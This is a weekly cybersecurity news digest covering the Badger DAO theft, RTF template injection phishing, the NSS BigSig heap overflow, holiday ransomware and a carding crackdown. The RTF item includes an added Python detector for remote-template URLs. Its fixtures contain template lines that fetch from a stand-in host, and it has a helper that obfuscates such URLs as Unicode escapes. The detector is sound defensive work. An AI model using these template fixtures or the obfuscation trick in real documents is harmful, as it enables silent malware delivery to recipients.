
Weekly News Digest #63

$120 million hack affecting Badger DAO Protocol

Badger DAO Protocol has fallen victim to a hack in which $120.3 million in cryptocurrencies was stolen from its users. The first user reports of possible problems came on Wednesday at 9 p.m. ET. According to data provided by PeckShield, the lost assets included 2,100 BTC and 151 ETH. The hack may be the result of an exploit in the Badger.com user interface. When claiming yield farming rewards and interacting with Badger vaults, users noticed spurious requests for additional permissions.

Upon noticing this suspicious activity, Badger froze all the vaults. The project started an investigation to identify how many users were affected and how many assets were stolen. The malicious requests may have started reaching users weeks prior to the attack. Following the hack, the price of the Badger DAO token declined by more than 20%.


Hackers use a simple technique to install malware on PCs

State-backed actors are using a simple technique in phishing campaigns aimed at spreading malware and stealing information that may be demanded by their governments. According to data provided by security experts from Proofpoint, hackers working on behalf of Russian, Chinese, and Indian interests use rich text format (RTF) template injection. The technique brings visible results because antivirus software used by many organizations doesn’t block RTF files by default.

Attackers weaponize RTF files by altering their document-formatting properties so that the file retrieves content from a URL the attackers control. As a result, a malware payload can be fetched silently and installed on the targeted machine. The technique has become popular among state-backed hackers because it is easy to use while being reliable enough to reach their targets.
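A defender-side check for the technique described above, as an added example that is not from Proofpoint or the original digest: it scans an RTF file for a `\*\template` destination (the RTF control word that names the document template) whose target is a URL, including targets written as `\uN` Unicode escapes. The function names and the sample documents are constructed for illustration.

```python
import re

# RTF destination that names the document template: {\*\template <target>}
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\b\s*([^{}]*)\}", re.IGNORECASE)
# One pass over RTF escapes: \\ (literal backslash), \'hh (hex byte),
# \uN followed by one fallback character (the RTF default, \uc1).
ESCAPE_RE = re.compile(
    r"\\\\|\\'([0-9a-fA-F]{2})|\\u(-?\d+) ?(?:\\'[0-9a-fA-F]{2}|[^\\])?"
)
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def decode_escape(m):
    if m.group(1):                       # \'hh
        return chr(int(m.group(1), 16))
    if m.group(2):                       # \uN is a signed 16-bit value
        return chr(int(m.group(2)) % 65536)
    return "\\"                          # escaped backslash in a file path


def find_remote_templates(data: bytes) -> list:
    """Return template targets in an RTF document that point at a URL."""
    if not data.lstrip().startswith(b"{\\rtf"):
        return []                        # not RTF, nothing to inspect
    hits = []
    for m in TEMPLATE_RE.finditer(data):
        raw = m.group(1).decode("latin-1")
        target = ESCAPE_RE.sub(decode_escape, raw).strip()
        if REMOTE_RE.match(target):
            hits.append(target)
    return hits


def u_encode(text: str) -> bytes:
    """Write text as \\uN? escapes, the obfuscated form a scanner must decode."""
    return "".join(f"\\u{ord(c)}?" for c in text).encode()


# Constructed sample documents (example.invalid is a reserved, non-routable name).
BENIGN = rb"{\rtf1\ansi{\*\template C:\\Templates\\report.dotx}Hello}"
PLAIN_URL = rb"{\rtf1\ansi{\*\template http://example.invalid/t.dotm}Hello}"
ENCODED = (rb"{\rtf1\ansi{\*\template "
           + u_encode("https://example.invalid/x") + rb"}Hi}")

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN), ("plain", PLAIN_URL), ("encoded", ENCODED)]:
        print(name, find_remote_templates(doc))
```

A local template path is left alone; only a template target that resolves to a URL is reported, which makes the result suitable as a mail-gateway or triage signal for RTF attachments.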


Critical bug in Mozilla’s NSS crypto library may affect other software

There is a risk that malicious actors can exploit Mozilla’s cross-platform Network Security Services (NSS) cryptographic library to crash an application or execute arbitrary code. Mozilla has rolled out fixes to address the critical security weakness. The flaw is tracked as CVE-2021-43527 and affects NSS versions prior to 3.73 or 3.68.1 ESR. It is a heap overflow vulnerability.

The bug, codenamed “BigSig”, is likely to have been exploited since June 2012. Although the bug does not affect Mozilla’s Firefox web browser itself, PDF viewers, email clients, and other applications that use NSS for signature verification are likely to be vulnerable to the flaw.


Many more ransomware attacks are detected during the holiday period

Security specialists from the security company Cybereason have analyzed the state of ransomware during the holiday period and at weekends. They collected data from 500 UK professionals. 37% of respondents admitted that their companies have no contingency plans in place to react to ransomware attacks during weekends or the holiday period. At the same time, almost 90% of respondents are concerned about the risk of facing ransomware attacks during these periods.

According to Cybereason CEO Lior Div, the most disruptive attacks in 2021 took place at weekends as well as during major holidays. Organizations are not prepared enough to address such cyber threats: neither appropriate technologies nor responsible officers are in place.


Record haul in anti-card fraud operation by police

The Carding Action 2021 led by Italy in partnership with the UK, leading card schemes, and Europol has saved European cardholders tens of millions of USD in cybercrime losses. The cross-border anti-fraud initiative targeted underground sites on which fraudsters and cybercriminals were stealing card data. The three-month operation has already resulted in the identification of 12 vendors selling stolen credit card data and the sum of prevented losses equals $16 million. 

However, only 50,000 stolen cards have been analyzed. The figure of prevented losses has been calculated by multiplying the average spending per card by the number of identified cards. Security specialists were analyzing such sources of compromised payment records as a botnet and JS-sniffer infrastructure. Carding Action 2021 is a great example of joint initiatives that play a key role in disrupting cybercrime globally. 
